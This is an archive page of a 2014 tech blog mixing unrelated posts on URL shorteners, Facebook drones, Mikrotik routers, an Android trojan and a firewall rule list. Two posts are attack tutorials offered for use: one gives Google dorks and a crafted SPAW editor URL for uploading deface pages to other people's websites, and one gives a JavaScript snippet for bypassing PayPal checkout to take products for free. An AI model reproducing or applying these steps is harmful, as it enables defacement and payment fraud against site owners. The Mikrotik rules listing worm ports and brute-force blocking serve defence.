Selasa, 01 April 2014

Make $100 a Month Without Blog with Shorte.st




There are many reasons for short URLs to stay in the online business. Turning long links into short URLs cannot only save space when posting links onto social networks, but also can prevent from broken links and link wrappings. Online marketers also use short URLs to mask links’ original sources when they promote affiliate products. But there is another good reason for short URLs to be in place. That is to earn money online by sharing ads revenue. Today i’m going to discuss about one of the best url shortner for earning money. Just read on it for more. ;)

Shorte.st detailed information

Shorte.st is a site which allows you to shorten your URL, it is no different from adf.ly and adfoc.us . However it does differ because they have good click value and easy interface. When ever someone opens the short url there is a 5 second frame which shows an ad. The timing is very short and thus majority of the people using this service don’t mind the wait in return for using the system.

How to make money with Shorte.st?

Like on other url shortner sites you can earn money by,
  • Share your shortest links on social media sites like facebook, twitter and google+
  • Share your links on forums
  • Refer your friends
Benefits of This New Site:-
  • Only premium ads – They select only the best ads.
  • Big payouts – You’ll be happy.
  • Simple interface – They designed shorte.st to make it easy to use
  • Real time statistics – All statistics in real time for better user experience

At Finally,

I used to use ad.fly to make money online but it was only around $5 per 1k so now I use this awesome site which is paying higher than adf.ly. You can earn your first earning by using the below image :)
      


Source: Techgator.org
Read more

Facebook Internet Project: The Skies Have It

Facebook's plan to fill the skies with Internet access points could "put a big crimp in some totalitarian governments' [efforts] to restrict and control citizens' access," said tech analyst Laura DiDio, "because the ability to connect to the Internet could literally be flying overhead. I'm sure certain countries are already having fits." Still, it could be a real boon for sparsely populated areas.



Facebook last week announced more detailed plans to bring affordable Internet access to every person on the planet.
Mark Zuckerberg, the company's chief executive, revealed some fresh details about the work Facebook's Connectivity Lab is carrying out to build drones, satellites and lasers geared to providing connectivity for everyone as part of the
Internet.org initiative.

The lab has made strong progress, noted Zuckerberg, with projects in the Philippines and Paraguay doubling the number of people who use mobile data connections through Facebook's telecom partners, enabling a total of 3 million new people to access the Internet.

Aerospace Experts


Facebook's Connectivity Lab team is looking at innovative ways of bringing access to the billions of people who do not yet have it. The team includes aerospace and communications technology experts from institutions such as NASA's Jet Propulsion Lab (which is behind projects including the Mars Curiosity rover) and Ames Research Center.
Facebook just added key team members from Ascenta, which has expertise in designing and building high-altitude long endurance aircraft. The team members have more than 100 years' experience in the aerospace industry, holding leadership positions with companies including Boeing and QinetiQ. The company's founders created Zephyr, which was the planet's longest-flying unmanned aircraft powered by solar energy. Those team members will join the Connectivity Lab group that works on connectivity aircraft.
Earlier this month, Facebook was
rumored to be in talks to buy drone manufacturer Titan Aerospace to bolster the Internet.org project.

New Delivery Platforms


The Connectivity Lab's approach to solving the complex problem is in providing different solutions to different-sized communities. They are creating new delivery platforms like planes and satellites to bring Internet access to communities.
"Facebook has now joined the group of companies that throws stuff against the wall waiting to see what sticks," telecom analyst Jeff Kagan told TechNewsWorld.
"What sounds crazy today often becomes commonplace tomorrow. Could something like this complicate efforts by some countries to restrict or control Internet access? Sure. However those countries will develop ways to interfere with this signal if they want," he pointed out.
The Connectivity Lab team has been working on solar-powered high altitude long endurance (HALE) aircraft that can stay in the air for months without needing to land. These devices can be deployed quickly and provide reliable connectivity. Facebook plans to deploy them in suburban areas in limited geographical regions.

Geosynchronous Satellites


In lower-density population areas, the team is more likely to use low-Earth orbit and geosynchronous satellites that can beam Internet access to the ground.
The team is examining the use of free-space optical communication for all of these solutions. FSO is a way of transmitting data through space via infrared laser beams that are invisible to the naked eye. FSO may allow the team to drastically increase the speed of connections that satellites and drones can offer.
There are still many challenges in place, however, between Facebook's team and bringing reliable, affordable Internet access to all.

'Hypothetical' Approaches


"Other than the satellite technology mentioned in the announcement, the other approaches are largely hypothetical both technologically and financially," Charles King, principal at Pund-It, told TechNewsWorld.
"HALE aircraft are in their infancy from a commercial standpoint, and PSO is more or less prenatal. So Facebook and its partners have a long way to go to prove that these approaches are both workable and financially sustainable," he said.
"The largest issues may actually be regulatory -- arranging agreements with ruling bodies in the countries involved, some of which are technologically unsophisticated and/or view outsiders with suspicion," King added.
"It may be easier to get a HALE aircraft off the ground than to hammer out agreements on the ground. Another issue is proving the relative value of Internet access in places where access to clean drinking water and sanitary toilets is unknown or a work in progress. I understand technology boosterism, but the Internet can't and won't fix everything," he pointed out.
"It is pretty complex and technology-rich in areas where the weather, skills and ecosystem have trouble handling pre-industrial revolution technology. Logistics and support will be a nightmare," noted Rob Enderle, principal at the Enderle Group.
"These environments trend towards tropical and are a nightmare for machines and particularly electronics. They likely should be using a lower tech approach because the local environment will chew up and spit out high-tech," he told TechNewsWorld.

'Shooting Down'


"I expect some governments will just shoot this stuff down and arrest, deport or remove folks trying to get around local laws and rules preventing access," Enderle continued.
"It will certainly make containment for the governments harder, but governments have armies and typically don't react well to this kind of activity," he observed.
"This can potentially put a big crimp in some totalitarian governments' [efforts] to restrict and control citizens' access, because the ability to connect to the Internet could literally be flying overhead. I'm sure certain countries are already having fits," Laura DiDio, principal at ITIC, told TechNewsWorld.
"On the other hand, this technology could prove to be a real boon for sparsely populated areas -- even here in the U.S. -- where there is no electricity and where there are very long distances to cellphone towers and therefore no Internet or mobile phone access," she said. "The best examples of this are Native American Indian reservations."
Read more

Microsoft to Shut Down Games for Windows Live store


It is a bad news for the Microsoft games lover that now they are not able to enjoy more games from windows live store. Software giant firm, Microsoft has officially confirmed that the Games for Windows Live marketplace will shut on August 22. However, the Games for Windows Live service will remain operational, and purchased games will not be affected by the closure.




Microsoft confirms that Windows Live client service will continue to operate after the shutting the windows live market place. Users can still be able to access previously-purchased content via the GFWL client. Microsoft spokesperson said,

"You can continue to enjoy previously purchased games and downloadable content in your catalog by downloading them through the Games for Windows Live client. Although purchase functionality will be discontinued through this marketplace, the Games for Windows Live service will continue to operate as usual."


The closure comes as a result of a forthcoming Xbox 360 update that will convert Microsoft points into local currency.Microsoft has asked Windows Live customers to spend their Microsoft point balances before the change is implemented, as converted cash applies to the Xbox Live Marketplace and the Windows Phone Store.

Read more

Senin, 31 Maret 2014

Cara Mengatasi Lampu LED Mikrotik Kelap-Kelip

Saya punya Mikrotik RB751U-2HnD yang saya gunakan untuk hotspot di rumah. 3 bulan saya tinggal ke luar kota, ternyata Mikrotik nya rusak. Semua lampu LED nya kelap-kelip seperti lampu disco, kecuali LED wlan nya. Saya cari tahu, kenapa bisa begitu. Usut punya usut, ternyata Mikrotik ini sering dimatikan langsung tanpa shutdown yang benar. Saya kira Mikrotik nya sudah rusak, karena tidak bisa berjalan normal, dan tidak bisa diakses melalui winbox. 



Saya coba cari solusinya di internet, ternyata ada juga yang mengalami hal serupa. Mereka menyarankan untuk mengganti Power Supply original mikrotik 12 V DC dengan Power Supply lain yang punya tegangan lebih tinggi. Kemudian saya coba gunakan Power Supply lain dengan tegangan 15 V DC. Ternyata Mikrotik nya mau nyala, lampu LED nya tidak lagi kedap-kedip seperti lampu disco. Mikrotik bekerja dengan normal kembali. Saya juga bisa mengakses mikrotik nya via winbox dan setingan yang dulu pun tidak hilang.

Jadi, dari masalah Lampu LED Mikrotik Kelap-Kelip ini solusinya yaitu dengan mengganti power supply mikrotik. Saya sarankan untuk mengganti Power Supply nya dengan Power Supply original Mikrotik 24 V DC.

Untuk lebih jelasnya, liat video yang saya buat khusus untuk anda berikut ini :
 
Read more

Jumat, 28 Maret 2014

Android.Pjapps.B - New Android Trojan Reported By Symantec team

new-android-virus-reported-by-symantec

Earlier this month researcher from Symantec have found a new android rat named as "Dendroid". Today they reported another trojan  Android.Pjapps.B , new trojan specifically designed to target Android devices.

Android.Pjapps.B may arrive as a package with the following name com.mobile.app.writer.zhongguoyang

Once executed, the Trojan creates the following receivers:
  • com.android.main.SmsReceiver
  • com.android.main.ActionReceiver
When the Trojan is being installed  then it opens a back door on the compromised device and may perform the following actions: 
  • Send and monitor SMS messages
  • Read and write the user's browsing history and bookmarks
  • Install packages
  • Write to external storage
Symantec Security Response also gives some security measures to the users and administrators:-
  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
How to remove?? 
To remove this risk manually, please perform the following actions: 
  1. Open the Google Android Menu.
  2. Go to the Settings icon and select Applications.
  3. Next, click Manage.
  4. Select the application and click the Uninstall button.
Source: Cyberkendra
Read more

Kamis, 27 Maret 2014

Spaw Shell Upload Vulnerablity

Spaw Shell Upload Vulnerablity:Hello Friends, today I'm going to share another Shell upload Vulnerablity with you all called Spaw Shell Upload Vulnerablity.. 2016

Follow the Instructions:-

1). Go to google and paste one of the following dorks as you like :)
  inurl:"spaw2/dialogs/"
  inurl:"spaw2/uploads/files/"
2). You will get lots of results. Open any site..
For Example i got :- example.com/spaw2/dialogs/
3). Now replace spaw2/dialogs/ with
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
  So now our url will look like this :-
example.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4). Now open the site and it will look like this->



5). Now upload your deface page.. :)

Happy Hacking..ONly for educational Purposes..

Tags:

Read more

Selasa, 18 Maret 2014

Memblokir Port Virus di Mikrotik Menggunakan Firewall

Penyebaran virus dan malware di jaringan dapat terjadi jika kita tidak selektif dalam mengaktifkan port apa saja yang digunakan. Untuk mengamankan jaringan dari penyebaran virus dan malware, kita dapat menutup port komunikasi yang tidak digunakan dan rentan dimanfaatkan oleh virus. Caranya dengan menggunakan rule firewall Mikrotik untuk men-drop paket yang masuk ke port yang tidak digunakan.

Caranya sangat mudah, silakan anda copy paste command berikut ini ke terminal Mikrotik :


/ ip firewall filter
add chain=virus protocol=tcp dst-port=135-139 action=drop comment="Blaster Worm"
add chain=virus protocol=udp dst-port=135-139 action=drop comment="Messenger Worm"
add chain=virus protocol=tcp dst-port=445 action=drop comment="Blaster Worm"
add chain=virus protocol=udp dst-port=445 action=drop comment="Blaster Worm"
add chain=virus protocol=tcp dst-port=593 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1080 action=drop comment="Drop MyDoom"
add chain=virus protocol=tcp dst-port=1214 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1363 action=drop comment="ndm requester"
add chain=virus protocol=tcp dst-port=1364 action=drop comment="ndm server"
add chain=virus protocol=tcp dst-port=1368 action=drop comment="screen cast"
add chain=virus protocol=tcp dst-port=1373 action=drop comment="hromgrafx"
add chain=virus protocol=tcp dst-port=1377 action=drop comment="cichlid"

add chain=virus protocol=tcp dst-port=2745 action=drop comment="Bagle Virus"
add chain=virus protocol=tcp dst-port=2283 action=drop comment="Dumaru.Y"
add chain=virus protocol=tcp dst-port=2535 action=drop comment="Beagle"
add chain=virus protocol=tcp dst-port=2745 action=drop comment="Beagle.C-K"
add chain=virus protocol=tcp dst-port=3127-3128 action=drop comment="MyDoom"
add chain=virus protocol=tcp dst-port=3410 action=drop comment="Backdoor OptixPro"
add chain=virus protocol=tcp dst-port=4444 action=drop comment="Worm"
add chain=virus protocol=udp dst-port=4444 action=drop comment="Worm"
add chain=virus protocol=tcp dst-port=5554 action=drop comment="Drop Sasser"
add chain=virus protocol=tcp dst-port=8866 action=drop comment="Drop Beagle.B"
add chain=virus protocol=tcp dst-port=9898 action=drop comment="Drop Dabber.A-B"
add chain=virus protocol=tcp dst-port=10000 action=drop comment="Drop Dumaru.Y"
add chain=virus protocol=tcp dst-port=10080 action=drop comment="Drop MyDoom.B"
add chain=virus protocol=tcp dst-port=12345 action=drop comment="Drop NetBus"
add chain=virus protocol=tcp dst-port=17300 action=drop comment="Drop Kuang2"
add chain=virus protocol=tcp dst-port=27374 action=drop comment="Drop SubSeven"
add chain=virus protocol=tcp dst-port=65506 action=drop comment="Drop PhatBot,Agobot, Gaobot"
add chain=virus protocol=udp dst-port=12667 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=27665 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=31335 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=27444 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=34555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=35555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=27444 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=27665 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=31335 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=31846 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=34555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=35555 action=drop comment="Trinoo" disabled=no
add action=drop chain=forward comment=";;Block W32.Kido - Conficker" disabled=no protocol=udp src-port=135-139,445
add action=drop chain=forward comment="" disabled=no dst-port=135-139,445 protocol=udp
add action=drop chain=forward comment="" disabled=no protocol=tcp src-port=135-139,445,593
add action=drop chain=forward comment="" disabled=no dst-port=135-139,445,593 protocol=tcp
add action=accept chain=input comment="Allow limited pings" disabled=no limit=50/5s,2 protocol=icmp
add action=accept chain=input comment="" disabled=no limit=50/5s,2 protocol=icmp
add action=drop chain=input comment="drop FTP Brute Forcers" disabled=no dst-port=21 protocol=tcp src-address-list=FTP_BlackList
add action=drop chain=input comment="" disabled=no dst-port=21 protocol=tcp src-address-list=FTP_BlackList
add action=accept chain=output comment="" content="530 Login incorrect" disabled=no dst-limit=1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=FTP_BlackList address-list-timeout=1d chain=output comment="" content="530 Login incorrect" disabled=no protocol=tcp
add action=drop chain=input comment="drop SSH&TELNET Brute Forcers" disabled=no dst-port=22-23 protocol=tcp src-address-list=IP_BlackList
add action=add-src-to-address-list address-list=IP_BlackList address-list-timeout=1d chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_3
add action=add-src-to-address-list address-list=SSH_BlackList_3 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_2
add action=add-src-to-address-list address-list=SSH_BlackList_2 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_1
add action=add-src-to-address-list address-list=SSH_BlackList_1 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp
add action=drop chain=input comment="drop port scanners" disabled=no src-address-list=port_scanners
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,syn
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=syn,rst
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
Hasilnya akan jadi seperti ini :


Nah, sekarang kita sudah berhasil Memblokir Port Virus Menggunakan Firewall di Mikrotik.
Semoga bermanfaat :)
Read more

Minggu, 16 Maret 2014

Paypal Javascript Exploit - Get Products Free

In this Tutorial we are talking about Paypal Javascript  Exploit. So Here is a simple JavaScript exploit through which you can hack Paypal & download products for free without spending single penny . More then 500 sites are Vulnerable !! .



So lets start..! ;)

Follow The Instructions:-


1). Go to the vulnerable site & paste the below JavaScript given below in the browser & hit enter !!.


javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);




2). So after you have hit enter, just sit back & enjoy the free product .


3). So after you paste the JavaScript in the URL then the product will be automatically downloaded :)





More Vulnerable sites link -

 Click Here  (some sites are patched)
&

Enjoy...!!
Read more